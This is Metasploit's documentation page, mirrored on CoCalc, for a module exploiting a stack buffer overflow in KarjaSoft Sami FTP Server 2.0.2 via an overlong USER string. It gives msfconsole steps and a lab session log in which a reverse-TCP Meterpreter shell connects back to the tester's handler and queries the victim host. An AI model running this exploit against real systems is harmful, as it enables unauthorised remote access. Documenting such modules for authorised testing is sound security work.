CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/ftp/sami_ftpd_user.md
Views: 11789

Vulnerable Application

This module exploits an unauthenticated stack buffer overflow in KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long USER string during login.

The payload is triggered when the administrator opens the application GUI. If the GUI window is open at the time of exploitation, the payload will be executed immediately. Keep this in mind when selecting payloads. The application will crash following execution of the payload and will not restart automatically.

When the application is restarted, it will re-execute the payload unless the payload has been manually removed from the SamiFTP.binlog log file.

This module has been tested successfully on Sami FTP Server versions:

  • 2.0.2 on Windows XP SP0 (x86)

  • 2.0.2 on Windows 7 SP1 (x86)

  • 2.0.2 on Windows 7 SP1 (x64)

  • 2.0.2 on Windows 10 (1909) (x64)

Verification Steps

Download:

Metasploit:

  1. msfconsole

  2. use exploit/windows/ftp/sami_ftpd_user

  3. set rhosts <rhosts>

  4. exploit

Options

Scenarios

KarjaSoft Sami FTP Server version 2.0.2 on Windows 10 (1909) (x64)

msf6 > use exploit/windows/ftp/sami_ftpd_user 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/ftp/sami_ftpd_user) > set rhosts 172.16.191.199
rhosts => 172.16.191.199
msf6 exploit(windows/ftp/sami_ftpd_user) > check
[*] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
msf6 exploit(windows/ftp/sami_ftpd_user) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.199:21 - Executing automatic check (disable AutoCheck to override)
[+] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
[*] 172.16.191.199:21 - Sending payload (1414 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.199
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:49874) at 2021-02-19 20:24:31 -0500

meterpreter > getuid
Server username: DESKTOP-6VPIDIM\user
meterpreter > sysinfo
Computer        : DESKTOP-6VPIDIM
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x86/windows
meterpreter >